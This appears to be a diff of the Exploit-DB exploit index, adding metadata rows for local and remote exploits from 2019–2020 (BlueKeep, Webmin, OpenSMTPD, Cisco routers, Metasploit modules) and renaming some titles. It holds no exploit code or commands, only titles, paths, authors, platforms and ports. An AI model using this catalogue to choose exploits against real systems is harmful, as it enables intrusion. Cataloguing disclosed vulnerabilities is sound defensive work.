+48227,exploits/windows/local/48227.txt,"NetBackup 7.0 - 'NetBackup INET Daemon' Unquoted Service Path",2020-03-18,"El Masas",local,windows,
+48231,exploits/multiple/local/48231.md,"Microsoft VSCode Python Extension - Code Execution",2020-03-17,Doyensec,local,multiple,
+48232,exploits/macos/local/48232.md,"VMWare Fusion - Local Privilege Escalation",2020-03-17,Grimm,local,macos,
+48235,exploits/macos/local/48235.sh,"VMware Fusion 11.5.2 - Privilege Escalation",2020-03-20,"Rich Mirch",local,macos,
+48246,exploits/windows/local/48246.txt,"Veyon 4.3.4 - 'VeyonService' Unquoted Service Path",2020-03-24,"Víctor García",local,windows,
+48249,exploits/windows/local/48249.txt,"AVAST SecureLine 5.5.522.0 - 'SecureLine' Unquoted Service Path",2020-03-25,"Roberto Piña",local,windows,
+48251,exploits/windows/local/48251.txt,"10-Strike Network Inventory Explorer - 'srvInventoryWebServer' Unquoted Service Path",2020-03-25,"Felipe Winsnes",local,windows,
+48253,exploits/windows/local/48253.py,"10-Strike Network Inventory Explorer 8.54 - 'Add' Local Buffer Overflow (SEH)",2020-03-25,"Felipe Winsnes",local,windows,
+48257,exploits/windows/local/48257.py,"Easy RM to MP3 Converter 2.7.3.700 - 'Input' Local Buffer Overflow (SEH)",2020-03-27,"Felipe Winsnes",local,windows,
+48264,exploits/windows/local/48264.py,"10-Strike Network Inventory Explorer 9.03 - 'Read from File' Buffer Overflow (SEH)(ROP)",2020-03-30,Hodorsec,local,windows,
+48267,exploits/windows/local/48267.txt,"Microsoft Windows 10 (1903/1909) - 'SMBGhost' SMB3.1.1 'SMB2_COMPRESSION_CAPABILITIES' Local Privilege Escalation",2020-03-30,"Daniel García Gutiérrez",local,windows,
+48277,exploits/windows/local/48277.py,"10Strike LANState 9.32 - 'Force Check' Buffer Overflow (SEH)",2020-04-01,Hodorsec,local,windows,
+48279,exploits/windows/local/48279.py,"DiskBoss 7.7.14 - 'Input Directory' Local Buffer Overflow (PoC)",2020-04-02,"Paras Bhatia",local,windows,
+48281,exploits/windows/local/48281.py,"AIDA64 Engineer 6.20.5300 - 'Report File' filename Buffer Overflow (SEH)",2020-04-03,Hodorsec,local,windows,
+48283,exploits/windows/local/48283.txt,"Memu Play 7.1.3 - Insecure Folder Permissions",2020-04-06,chuyreds,local,windows,
+48293,exploits/windows/local/48293.py,"Triologic Media Player 8 - '.m3l' Buffer Overflow (Unicode) (SEH)",2020-04-06,"Felipe Winsnes",local,windows,
+48299,exploits/windows/local/48299.txt,"Microsoft NET USE win10 - Insufficient Authentication Logic",2020-04-06,hyp3rlinx,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -10639,7 +11278,7 @@ id,file,description,date,author,type,platform,port
 753,exploits/windows/remote/753.html,"Microsoft Internet Explorer - '.ANI' Remote Stack Overflow (MS05-002) (2)",2005-01-12,Skylined,remote,windows,
 759,exploits/windows/remote/759.cpp,"Apple iTunes - Playlist Buffer Overflow Download Shellcode",2005-01-16,ATmaCA,remote,windows,
 761,exploits/windows/remote/761.cpp,"NodeManager Professional 2.00 - Remote Buffer Overflow",2005-01-18,"Tan Chew Keong",remote,windows,162
-764,exploits/unix/remote/764.c,"Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow",2003-04-04,spabam,remote,unix,80
+764,exploits/unix/remote/764.c,"Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (1)",2003-04-04,spabam,remote,unix,80
 765,exploits/windows/remote/765.c,"Microsoft Internet Explorer - '.ANI' Universal (MS05-002)",2005-01-22,houseofdabus,remote,windows,
 767,exploits/windows/remote/767.pl,"Golden FTP Server 2.02b - Remote Buffer Overflow",2005-01-22,Barabas,remote,windows,21
 771,exploits/windows/remote/771.cpp,"Microsoft Internet Explorer - '.ANI' Downloader (MS05-002)",2005-01-24,Vertygo,remote,windows,
@@ -17191,7 +17830,7 @@ id,file,description,date,author,type,platform,port
 45052,exploits/hardware/remote/45052.py,"HomeMatic Zentrale CCU2 - Remote Code Execution",2018-07-18,"Kacper Szurek",remote,hardware,
 45079,exploits/windows/remote/45079.txt,"Microsoft Windows - 'dnslint.exe' Drive-By Download",2018-07-23,hyp3rlinx,remote,windows,
 45099,exploits/php/remote/45099.rb,"WordPress Plugin Responsive Thumbnail Slider - Arbitrary File Upload (Metasploit)",2018-07-27,Metasploit,remote,php,80
-45100,exploits/linux/remote/45100.rb,"Axis Network Camera - .srv to parhand RCE (Metasploit)",2018-07-27,Metasploit,remote,linux,80
+45100,exploits/linux/remote/45100.rb,"Axis Network Camera - .srv to parhand Remote Code Execution (Metasploit)",2018-07-27,Metasploit,remote,linux,80
 45124,exploits/linux/remote/45124.rb,"SonicWall Global Management System - XMLRPC set_time_zone Command Injection (Metasploit)",2018-08-01,Metasploit,remote,linux,80
 45332,exploits/hardware/remote/45332.py,"FUJI XEROX DocuCentre-V 3065 Printer - Remote Command Execution",2018-09-05,vr_system,remote,hardware,9100
 45180,exploits/windows/remote/45180.txt,"Microsoft DirectX SDK - 'Xact.exe' Remote Code Execution",2018-08-13,hyp3rlinx,remote,windows,
@@ -17238,11 +17877,11 @@ id,file,description,date,author,type,platform,port
 45925,exploits/java/remote/45925.rb,"Apache Spark - (Unauthenticated) Command Execution (Metasploit)",2018-11-30,Metasploit,remote,java,6066
 45926,exploits/windows/remote/45926.py,"CyberArk 9.7 - Memory Disclosure",2018-12-03,"Thomas Zuk",remote,windows,1858
 45939,exploits/linux/remote/45939.py,"OpenSSH < 7.7 - User Enumeration (2)",2018-12-04,"Leap Security",remote,linux,22
-45952,exploits/windows/remote/45952.rb,"HP Intelligent Management - Java Deserialization RCE (Metasploit)",2018-12-04,Metasploit,remote,windows,8080
+45952,exploits/windows/remote/45952.rb,"HP Intelligent Management - Java Deserialization Remote Code Execution (Metasploit)",2018-12-04,Metasploit,remote,windows,8080
 45986,exploits/hardware/remote/45986.py,"Cisco RV110W - Password Disclosure / Command Execution",2018-12-14,RySh,remote,hardware,443
 45998,exploits/macos/remote/45998.rb,"Safari - Proxy Object Type Confusion (Metasploit)",2018-12-14,Metasploit,remote,macos,
 45999,exploits/windows/remote/45999.txt,"MiniShare 1.4.1 - 'HEAD/POST' Remote Buffer Overflow",2018-12-18,"Rafael Pedrero",remote,windows,80
-46024,exploits/multiple/remote/46024.rb,"Erlang - Port Mapper Daemon Cookie RCE (Metasploit)",2018-12-20,Metasploit,remote,multiple,25672
+46024,exploits/multiple/remote/46024.rb,"Erlang - Port Mapper Daemon Cookie Remote Code Execution (Metasploit)",2018-12-20,Metasploit,remote,multiple,25672
 46034,exploits/multiple/remote/46034.py,"Netatalk 3.1.12 - Authentication Bypass",2018-12-21,"Jacob Baines",remote,multiple,
 46052,exploits/multiple/remote/46052.py,"Kubernetes - (Unauthenticated) Arbitrary Requests",2018-12-10,evict,remote,multiple,
 46053,exploits/multiple/remote/46053.py,"Kubernetes - (Authenticated) Arbitrary Requests",2018-12-10,evict,remote,multiple,
@@ -17280,8 +17919,174 @@ id,file,description,date,author,type,platform,port
 46547,exploits/windows/remote/46547.py,"Mail Carrier 2.5.1 - 'MAIL FROM' Buffer Overflow",2019-03-15,"Joseph McDonagh",remote,windows,25
 46556,exploits/multiple/remote/46556.rb,"BMC Patrol Agent - Privilege Escalation Code Execution Execution (Metasploit)",2019-03-18,Metasploit,remote,multiple,3181
 46572,exploits/java/remote/46572.rb,"Jenkins 2.137 and Pipeline Groovy Plugin 2.61 - ACL Bypass and Metaprogramming Remote Code Execution (Metasploit)",2019-03-19,Metasploit,remote,java,
-46627,exploits/php/remote/46627.rb,"CMS Made Simple (CMSMS) Showtime2 - File Upload RCE (Metasploit)",2019-03-28,Metasploit,remote,php,80
+46627,exploits/php/remote/46627.rb,"CMS Made Simple (CMSMS) Showtime2 - File Upload Remote Code Execution (Metasploit)",2019-03-28,Metasploit,remote,php,80
 46628,exploits/multiple/remote/46628.rb,"Oracle Weblogic Server Deserialization RCE - Raw Object (Metasploit)",2019-03-28,Metasploit,remote,multiple,
+46641,exploits/php/remote/46641.rb,"TeemIp IPAM < 2.4.0 - 'new_config' Command Injection (Metasploit)",2019-04-03,AkkuS,remote,php,80
+46645,exploits/python/remote/46645.py,"PhreeBooks ERP 5.2.3 - Remote Command Execution",2019-04-03,"Metin Yunus Kandemir",remote,python,80
+46654,exploits/multiple/remote/46654.html,"Google Chrome 72.0.3626.96 / 74.0.3702.0 - 'JSPromise::TriggerPromiseReactions' Type Confusion",2019-04-03,"Google Security Research",remote,multiple,
+46655,exploits/hardware/remote/46655.rb,"Cisco RV320 and RV325 - Unauthenticated Remote Code Execution (Metasploit)",2019-04-03,Metasploit,remote,hardware,
+46662,exploits/php/remote/46662.rb,"WordPress 5.0.0 - Crop-image Shell Upload (Metasploit)",2019-04-05,Metasploit,remote,php,80
+46675,exploits/multiple/remote/46675.py,"QNAP Netatalk < 3.1.12 - Authentication Bypass",2019-04-08,muts,remote,multiple,
+46677,exploits/php/remote/46677.php,"PHP 7.2 - 'imagecolormatch()' Out of Band Heap Write",2019-02-27,cfreal,remote,php,
+46678,exploits/hardware/remote/46678.py,"TP-LINK TL-WR940N / TL-WR941ND - Buffer Overflow",2019-04-09,"Grzegorz Wypych",remote,hardware,80
+46682,exploits/multiple/remote/46682.py,"Apache Axis 1.4 - Remote Code Execution",2019-04-09,"David Yesland",remote,multiple,
+46693,exploits/linux/remote/46693.rb,"Zimbra Collaboration - Autodiscover Servlet XXE and ProxyServlet SSRF (Metasploit)",2019-04-12,Metasploit,remote,linux,8443
+46695,exploits/windows/remote/46695.py,"MailCarrier 2.51 - 'RCPT TO' Buffer Overflow",2019-04-15,"Dino Covotsos",remote,windows,25
+46697,exploits/windows/remote/46697.py,"RemoteMouse 3.008 - Arbitrary Remote Command Execution",2019-04-15,0rphon,remote,windows,
+46698,exploits/php/remote/46698.rb,"CuteNews 2.1.2 - 'avatar' Remote Code Execution (Metasploit)",2019-04-15,AkkuS,remote,php,
+46699,exploits/windows/remote/46699.py,"MailCarrier 2.51 - POP3 'USER' Buffer Overflow",2019-04-15,"Dino Covotsos",remote,windows,110
+46700,exploits/windows/remote/46700.py,"MailCarrier 2.51 - POP3 'LIST' SEH Buffer Overflow",2019-04-15,"Dino Covotsos",remote,windows,110
+46701,exploits/windows/remote/46701.py,"MailCarrier 2.51 - POP3 'TOP' SEH Buffer Overflow",2019-04-15,"Dino Covotsos",remote,windows,110
+46705,exploits/hardware/remote/46705.rb,"Cisco RV130W Routers - Management Interface Remote Command Execution (Metasploit)",2019-04-15,Metasploit,remote,hardware,
+46719,exploits/windows/remote/46719.py,"MailCarrier 2.51 - POP3 'RETR' SEH Buffer Overflow",2019-04-17,"Dino Covotsos",remote,windows,110
+46725,exploits/windows/remote/46725.rb,"ManageEngine Applications Manager 11.0 < 14.0 - SQL Injection / Remote Code Execution (Metasploit)",2019-04-18,AkkuS,remote,windows,
+46731,exploits/multiple/remote/46731.rb,"Atlassian Confluence Widget Connector Macro - Velocity Template Injection (Metasploit)",2019-04-19,Metasploit,remote,multiple,
+46740,exploits/multiple/remote/46740.rb,"ManageEngine Applications Manager 14.0 - Authentication Bypass / Remote Command Execution (Metasploit)",2019-04-22,AkkuS,remote,multiple,
+46748,exploits/multiple/remote/46748.txt,"Google Chrome 72.0.3626.121 / 74.0.3725.0 - 'NewFixedDoubleArray' Integer Overflow",2019-04-24,"Google Security Research",remote,multiple,
+46762,exploits/windows/remote/46762.py,"Freefloat FTP Server 1.0 - 'SIZE' Remote Buffer Overflow",2019-04-30,"Kevin Randall",remote,windows,21
+46763,exploits/windows/remote/46763.py,"Freefloat FTP Server 1.0 - 'STOR' Remote Buffer Overflow",2019-04-30,"Kevin Randall",remote,windows,21
+46775,exploits/php/remote/46775.rb,"Moodle 3.6.3 - 'Install Plugin' Remote Command Execution (Metasploit)",2019-04-30,AkkuS,remote,php,
+46782,exploits/windows/remote/46782.rb,"AIS logistics ESEL-Server - Unauthenticated SQL Injection Remote Code Execution (Metasploit)",2019-04-30,Metasploit,remote,windows,
+46783,exploits/php/remote/46783.rb,"Pimcore < 5.71 - Unserialize Remote Code Execution (Metasploit)",2019-04-30,Metasploit,remote,php,
+46785,exploits/linux/remote/46785.rb,"Ruby On Rails - DoubleTap Development Mode secret_key_base Remote Code Execution (Metasploit)",2019-05-02,Metasploit,remote,linux,3000
+46790,exploits/windows/remote/46790.txt,"Windows PowerShell ISE - Remote Code Execution",2019-05-03,hyp3rlinx,remote,windows,
+46792,exploits/linux/remote/46792.py,"Blue Angel Software Suite - Command Execution",2019-05-03,"Paolo Serracino_ Pietro Minniti_ Damiano Proietti",remote,linux,
+46795,exploits/hardware/remote/46795.rb,"LG Supersign EZ CMS - Remote Code Execution (Metasploit)",2019-05-06,"Alejandro Fanjul",remote,hardware,9080
+46797,exploits/windows/remote/46797.py,"Xitami Web Server 2.5 - Remote Buffer Overflow (SEH + Egghunter)",2019-05-06,ElSoufiane,remote,windows,80
+46808,exploits/windows/remote/46808.py,"Lotus Domino 8.5.3 - 'EXAMINE' Stack Buffer Overflow DEP/ASLR Bypass (NSA's EMPHASISMINE)",2019-05-08,"Charles Truscott",remote,windows,143
+46812,exploits/windows_x86/remote/46812.rb,"Google Chrome 72.0.3626.119 - 'FileReader' Use-After-Free (Metasploit)",2019-05-08,Metasploit,remote,windows_x86,
+46813,exploits/multiple/remote/46813.rb,"PostgreSQL 9.3 - COPY FROM PROGRAM Command Execution (Metasploit)",2019-05-08,Metasploit,remote,multiple,5432
+46814,exploits/multiple/remote/46814.rb,"Oracle Weblogic Server - 'AsyncResponseService' Deserialization Remote Code Execution (Metasploit)",2019-05-08,Metasploit,remote,multiple,7001
+46839,exploits/php/remote/46839.rb,"PHP-Fusion 9.03.00 - 'Edit Profile' Remote Code Execution (Metasploit)",2019-05-14,AkkuS,remote,php,
+46880,exploits/php/remote/46880.rb,"GetSimpleCMS - Unauthenticated Remote Code Execution (Metasploit)",2019-05-20,Metasploit,remote,php,
+46915,exploits/php/remote/46915.rb,"Shopware - createInstanceFromNamedArguments PHP Object Instantiation Remote Code Execution (Metasploit)",2019-05-23,Metasploit,remote,php,
+46928,exploits/windows/remote/46928.html,"Microsoft Internet Explorer Windows 10 1809 17763.316 - Scripting Engine Memory Corruption",2019-05-24,"Simon Zuckerbraun",remote,windows,
+46932,exploits/macos/remote/46932.txt,"Typora 0.9.9.24.6 - Directory Traversal",2019-05-27,"Dhiraj Mishra",remote,macos,
+46934,exploits/windows/remote/46934.txt,"Petraware pTransformer ADC < 2.1.7.22827 - Login Bypass",2019-05-28,"Faudhzan Rahman",remote,windows,
+46942,exploits/java/remote/46942.rb,"Oracle Application Testing Suite - WebLogic Server Administration Console War Deployment (Metasploit)",2019-05-29,Metasploit,remote,java,
+46960,exploits/hardware/remote/46960.py,"NUUO NVRMini 2 3.9.1 - 'sscanf' Stack Overflow",2019-06-04,@0x00string,remote,hardware,
+46961,exploits/hardware/remote/46961.py,"Cisco RV130W 1.0.3.44 - Remote Stack Overflow",2019-06-04,@0x00string,remote,hardware,
+46969,exploits/windows/remote/46969.rb,"IBM Websphere Application Server - Network Deployment Untrusted Data Deserialization Remote Code Execution (Metasploit)",2019-06-05,Metasploit,remote,windows,
+46970,exploits/linux/remote/46970.rb,"LibreNMS - addhost Command Injection (Metasploit)",2019-06-05,Metasploit,remote,linux,
+46974,exploits/linux/remote/46974.txt,"Exim 4.87 < 4.91 - (Local / Remote) Command Execution",2019-06-05,"Qualys Corporation",remote,linux,
+46984,exploits/linux/remote/46984.rb,"Webmin 1.910 - 'Package Updates' Remote Command Execution (Metasploit)",2019-06-11,AkkuS,remote,linux,
+46999,exploits/php/remote/46999.rb,"AROX School-ERP Pro - Unauthenticated Remote Command Execution (Metasploit)",2019-06-17,AkkuS,remote,php,
+47016,exploits/linux/remote/47016.rb,"Cisco Prime Infrastructure Health Monitor - TarArchive Directory Traversal (Metasploit)",2019-06-20,Metasploit,remote,linux,
+47019,exploits/windows/remote/47019.txt,"EA Origin < 10.5.38 - Remote Code Execution",2019-06-21,"Dominik Penner",remote,windows,
+47030,exploits/multiple/remote/47030.py,"SuperDoctor5 - 'NRPE' Remote Code Execution",2019-06-25,"Simon Gurney",remote,multiple,
+47031,exploits/hardware/remote/47031.py,"SAPIDO RB-1732 - Remote Command Execution",2019-06-25,k1nm3n.aotoi,remote,hardware,
+47039,exploits/linux/remote/47039.rb,"Nagios XI 5.5.6 - Magpie_debug.php Root Remote Code Execution (Metasploit)",2019-06-26,Metasploit,remote,linux,
+47047,exploits/linux/remote/47047.rb,"Linux Mint 18.3-19.1 - 'yelp' Command Injection (Metasploit)",2019-07-01,b1ack0wl,remote,linux,
+47067,exploits/hardware/remote/47067.py,"FaceSentry Access Control System 6.4.8 - Remote SSH Root",2019-07-01,LiquidWorm,remote,hardware,
+47073,exploits/windows/remote/47073.rb,"Apache Tomcat - CGIServlet enableCmdLineArguments Remote Code Execution (Metasploit)",2019-07-03,Metasploit,remote,windows,8080
+47076,exploits/windows/remote/47076.py,"Microsoft Exchange 2003 - base64-MIME Remote Code Execution",2019-07-05,"Charles Truscott",remote,windows,25
+47080,exploits/unix/remote/47080.c,"Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2)",2019-07-07,"Brian Peters",remote,unix,80
+47114,exploits/multiple/remote/47114.rb,"Xymon 4.3.25 - useradm Command Execution (Metasploit)",2019-07-12,Metasploit,remote,multiple,
+47129,exploits/linux/remote/47129.rb,"PHP Laravel Framework 5.5.40 / 5.6.x < 5.6.30 - token Unserialize Remote Command Execution (Metasploit)",2019-07-16,Metasploit,remote,linux,
+47130,exploits/windows/remote/47130.txt,"MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow",2019-07-17,hyp3rlinx,remote,windows,
+47137,exploits/windows_x86/remote/47137.py,"MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow (EggHunter)",2019-07-19,sasaga92,remote,windows_x86,
+47155,exploits/multiple/remote/47155.txt,"Trend Micro Deep Discovery Inspector IDS - Security Bypass",2019-07-24,hyp3rlinx,remote,multiple,
+47186,exploits/unix/remote/47186.rb,"Schneider Electric Pelco Endura NET55XX Encoder - Authentication Bypass (Metasploit)",2019-07-29,Metasploit,remote,unix,
+47187,exploits/php/remote/47187.rb,"WordPress Plugin Database Backup < 5.2 - Remote Code Execution (Metasploit)",2019-07-29,Metasploit,remote,php,80
+47195,exploits/linux/remote/47195.rb,"Redis 4.x / 5.x - Unauthenticated Code Execution (Metasploit)",2019-07-30,Metasploit,remote,linux,6379
+47208,exploits/windows/remote/47208.rb,"Apache Tika 1.15 - 1.17 - Header Command Injection (Metasploit)",2019-08-05,Metasploit,remote,windows,
+47209,exploits/multiple/remote/47209.py,"ARMBot Botnet - Arbitrary Code Execution",2019-08-05,prsecurity,remote,multiple,
+47215,exploits/php/remote/47215.rb,"Baldr Botnet Panel - Arbitrary Code Execution (Metasploit)",2019-08-08,"Ege Balci",remote,php,80
+47227,exploits/multiple/remote/47227.rb,"ManageEngine OpManager 12.4x - Privilege Escalation / Remote Command Execution (Metasploit)",2019-08-12,AkkuS,remote,multiple,
+47228,exploits/multiple/remote/47228.rb,"ManageEngine Application Manager 14.2 - Privilege Escalation / Remote Command Execution (Metasploit)",2019-08-12,AkkuS,remote,multiple,
+47229,exploits/multiple/remote/47229.rb,"ManageEngine OpManager 12.4x - Unauthenticated Remote Command Execution (Metasploit)",2019-08-12,AkkuS,remote,multiple,
+47230,exploits/linux/remote/47230.rb,"Webmin 1.920 - Unauthenticated Remote Code Execution (Metasploit)",2019-08-12,AkkuS,remote,linux,
+47243,exploits/php/remote/47243.py,"Agent Tesla Botnet - Arbitrary Code Execution",2019-08-13,prsecurity,remote,php,
+47244,exploits/php/remote/47244.py,"AZORult Botnet - SQL Injection",2019-08-13,prsecurity,remote,php,
+47256,exploits/php/remote/47256.rb,"Agent Tesla Botnet - Arbitrary Code Execution (Metasploit)",2019-08-14,"Ege Balci",remote,php,
+47298,exploits/multiple/remote/47298.rb,"LibreOffice < 6.2.6 Macro - Python Code Execution (Metasploit)",2019-08-21,LoadLow,remote,multiple,
+47313,exploits/multiple/remote/47313.txt,"Cisco UCS Director_ Cisco Integrated Management Controller Supervisor and Cisco UCS Director Express for Big Data - Multiple Vulnerabilities",2019-08-21,"Pedro Ribeiro",remote,multiple,
+47320,exploits/linux/remote/47320.c,"QEMU - Denial of Service",2019-08-20,vishnudevtj,remote,linux,
+47329,exploits/hardware/remote/47329.pl,"Cisco Email Security Appliance (IronPort) C160 - 'Host' Header Injection",2019-09-02,"Todor Donev",remote,hardware,
+47337,exploits/hardware/remote/47337.pl,"IntelBras TELEFONE IP TIP200/200 LITE 60.61.75.15 - Arbitrary File Read",2019-09-02,"Todor Donev",remote,hardware,
+47346,exploits/unix/remote/47346.rb,"Cisco UCS Director - default scpuser password (Metasploit)",2019-09-03,Metasploit,remote,unix,22
+47347,exploits/java/remote/47347.rb,"Cisco Data Center Network Manager - Unauthenticated Remote Code Execution (Metasploit)",2019-09-03,Metasploit,remote,java,443
+47348,exploits/hardware/remote/47348.rb,"Cisco RV110W/RV130(W)/RV215W Routers Management Interface - Remote Command Execution (Metasploit)",2019-09-03,Metasploit,remote,hardware,443
+47353,exploits/linux/remote/47353.rb,"AwindInc SNMP Service - Command Injection (Metasploit)",2019-09-05,Metasploit,remote,linux,
+47354,exploits/multiple/remote/47354.py,"Pulse Secure 8.1R15.1/8.2/8.3/9.0 SSL VPN - Remote Code Execution",2019-09-06,"Justin Wagner",remote,multiple,
+47358,exploits/linux/remote/47358.py,"FusionPBX 4.4.8 - Remote Code Execution",2019-09-06,Askar,remote,linux,
+47375,exploits/linux/remote/47375.rb,"LibreNMS - Collectd Command Injection (Metasploit)",2019-09-10,Metasploit,remote,linux,
+47376,exploits/php/remote/47376.rb,"October CMS - Upload Protection Bypass Code Execution (Metasploit)",2019-09-10,Metasploit,remote,php,
+47390,exploits/hardware/remote/47390.txt,"Inteno IOPSYS Gateway - Improper Access Restrictions",2019-09-16,"Gerard Fuguet",remote,hardware,
+47405,exploits/hardware/remote/47405.pl,"Hisilicon HiIpcam V100R003 Remote ADSL - Credentials Disclosure",2019-09-23,"Todor Donev",remote,hardware,
+47408,exploits/watchos/remote/47408.py,"HPE Intelligent Management Center < 7.3 E0506P09 - Information Disclosure",2019-09-23,"Lazy Hacker",remote,watchos,
+47412,exploits/windows/remote/47412.py,"File Sharing Wizard 1.5.0 - POST SEH Overflow",2019-09-24,x00pwn,remote,windows,80
+47416,exploits/windows/remote/47416.rb,"Microsoft Windows - BlueKeep RDP Remote Windows Kernel Use After Free (Metasploit)",2019-09-24,Metasploit,remote,windows,3389
+47439,exploits/multiple/remote/47439.txt,"GoAhead 2.5.0 - Host Header Injection",2019-09-30,Ramikan,remote,multiple,
+47442,exploits/hardware/remote/47442.py,"Cisco Small Business 220 Series - Multiple Vulnerabilities",2019-09-30,bashis,remote,hardware,
+47456,exploits/windows/remote/47456.rb,"DOUBLEPULSAR - Payload Execution and Neutralization (Metasploit)",2019-10-02,Metasploit,remote,windows,
+47472,exploits/windows/remote/47472.py,"freeFTP 1.0.8 - 'PASS' Remote Buffer Overflow",2019-10-07,"Chet Manly",remote,windows,
+47500,exploits/linux/remote/47500.py,"Podman & Varlink 1.5.1 - Remote Code Execution",2019-10-15,"Jeremy Brown",remote,linux,
+47515,exploits/android/remote/47515.cpp,"Whatsapp 2.19.216 - Remote Code Execution",2019-10-16,"Valerio Brussani",remote,android,
+47519,exploits/windows/remote/47519.py,"ThinVNC 1.0b1 - Authentication Bypass",2019-10-17,"Nikhith Tumamlapalli",remote,windows,
+47531,exploits/multiple/remote/47531.rb,"Total.js CMS 12 - Widget JavaScript Code Injection (Metasploit)",2019-10-22,Metasploit,remote,multiple,
+47536,exploits/hardware/remote/47536.txt,"Moxa EDR-810 - Command Injection / Information Disclosure",2019-10-22,RandoriSec,remote,hardware,
+47554,exploits/windows/remote/47554.py,"Win10 MailCarrier 2.51 - 'POP3 User' Remote Buffer Overflow",2019-10-29,"Lance Biggerstaff",remote,windows,
+47558,exploits/windows/remote/47558.py,"Microsoft Windows Server 2012 - 'Group Policy' Remote Code Execution",2019-10-29,"Thomas Zuk",remote,windows,
+47559,exploits/windows/remote/47559.py,"Microsoft Windows Server 2012 - 'Group Policy' Security Feature Bypass",2019-10-29,"Thomas Zuk",remote,windows,
+47566,exploits/hardware/remote/47566.cpp,"MikroTik RouterOS 6.45.6 - DNS Cache Poisoning",2019-10-31,"Jacob Baines",remote,hardware,
+47573,exploits/multiple/remote/47573.rb,"Nostromo - Directory Traversal Remote Command Execution (Metasploit)",2019-11-01,Metasploit,remote,multiple,
+47576,exploits/windows/remote/47576.py,"Ayukov NFTP client 1.71 - 'SYST' Buffer Overflow",2019-11-04,SYANiDE,remote,windows,
+47602,exploits/linux/remote/47602.rb,"rConfig - install Command Execution (Metasploit)",2019-11-08,Metasploit,remote,linux,
+47625,exploits/hardware/remote/47625.py,"eMerge E3 Access Controller 4.6.07 - Remote Code Execution",2019-11-12,LiquidWorm,remote,hardware,
+47626,exploits/hardware/remote/47626.rb,"eMerge E3 Access Controller 4.6.07 - Remote Code Execution (Metasploit)",2019-11-12,LiquidWorm,remote,hardware,
+47629,exploits/hardware/remote/47629.txt,"CBAS-Web 19.0.0 - Information Disclosure",2019-11-12,LiquidWorm,remote,hardware,
+47673,exploits/linux/remote/47673.py,"nipper-ng 0.11.10 - Remote Buffer Overflow (PoC)",2019-11-18,"Guy Levin",remote,linux,
+47683,exploits/windows_x86/remote/47683.py,"Microsoft Windows 7 (x86) - 'BlueKeep' Remote Desktop Protocol (RDP) Remote Windows Kernel Use After Free",2019-11-19,0xeb-bp,remote,windows_x86,
+47686,exploits/linux/remote/47686.py,"Cisco Prime Infrastructure Health Monitor HA TarArchive - Directory Traversal / Remote Code Execution",2019-05-17,mr_me,remote,linux,
+47697,exploits/multiple/remote/47697.rb,"FusionPBX - Operator Panel exec.php Command Execution (Metasploit)",2019-11-20,Metasploit,remote,multiple,
+47698,exploits/multiple/remote/47698.rb,"FreeSWITCH - Event Socket Command Execution (Metasploit)",2019-11-20,Metasploit,remote,multiple,
+47699,exploits/php/remote/47699.rb,"Bludit - Directory Traversal Image File Upload (Metasploit)",2019-11-20,Metasploit,remote,php,
+47700,exploits/multiple/remote/47700.rb,"Pulse Secure VPN - Arbitrary Command Execution (Metasploit)",2019-11-20,Metasploit,remote,multiple,
+47750,exploits/windows/remote/47750.py,"Integard Pro NoJs 2.2.0.9026 - Remote Buffer Overflow",2019-12-06,purpl3f0xsecur1ty,remote,windows,18881
+47792,exploits/linux/remote/47792.rb,"OpenMRS - Java Deserialization RCE (Metasploit)",2019-12-18,Metasploit,remote,linux,8081
+47799,exploits/windows/remote/47799.txt,"FreeSWITCH 1.10.1 - Command Execution",2019-12-20,1F98D,remote,windows,
+47837,exploits/multiple/remote/47837.py,"nostromo 1.9.6 - Remote Code Execution",2020-01-01,Kr0ff,remote,multiple,
+47885,exploits/java/remote/47885.txt,"Cisco DCNM JBoss 10.4 - Credential Leakage",2020-01-08,hantwister,remote,java,
+47888,exploits/hardware/remote/47888.py,"EBBISLAND EBBSHAVE 6100-09-04-1441 - Remote Buffer Overflow",2020-01-08,hantwister,remote,hardware,
+47889,exploits/linux/remote/47889.txt,"ASTPP VoIP 4.0.1 - Remote Code Execution",2020-01-08,"Fabien AUNAY",remote,linux,
+47891,exploits/java/remote/47891.txt,"JetBrains TeamCity 2018.2.4 - Remote Code Execution",2020-01-08,hantwister,remote,java,
+47924,exploits/linux/remote/47924.rb,"Barco WePresent - file_transfer.cgi Command Injection (Metasploit)",2020-01-15,Metasploit,remote,linux,
+47936,exploits/hardware/remote/47936.js,"Sagemcom F@ST 3890 (50_10_19-T1) Cable Modem - 'Cable Haunt' Remote Code Execution",2020-01-15,Lyrebirds,remote,hardware,
+47956,exploits/linux/remote/47956.py,"Pachev FTP Server 1.0 - Path Traversal",2020-01-23,1F98D,remote,linux,21
+47984,exploits/linux/remote/47984.py,"OpenSMTPD 6.6.2 - Remote Code Execution",2020-01-30,1F98D,remote,linux,
+48004,exploits/hardware/remote/48004.c,"HiSilicon DVR/NVR hi3520d firmware - Remote Backdoor Account",2020-02-05,Snawoot,remote,hardware,
+48037,exploits/linux_mips/remote/48037.rb,"D-Link Devices - Unauthenticated Remote Command Execution in ssdpcgi (Metasploit)",2020-02-10,Metasploit,remote,linux_mips,1900
+48038,exploits/linux/remote/48038.rb,"OpenSMTPD - MAIL FROM Remote Code Execution (Metasploit)",2020-02-10,Metasploit,remote,linux,25
+48051,exploits/openbsd/remote/48051.pl,"OpenSMTPD 6.4.0 < 6.6.1 - Local Privilege Escalation + Remote Code Execution",2020-02-11,"Marco Ivaldi",remote,openbsd,
+48053,exploits/windows/remote/48053.py,"Microsoft SharePoint - Deserialization Remote Code Execution",2020-01-21,Voulnet,remote,windows,
+48092,exploits/windows/remote/48092.rb,"Anviz CrossChex - Buffer Overflow (Metasploit)",2020-02-17,Metasploit,remote,windows,
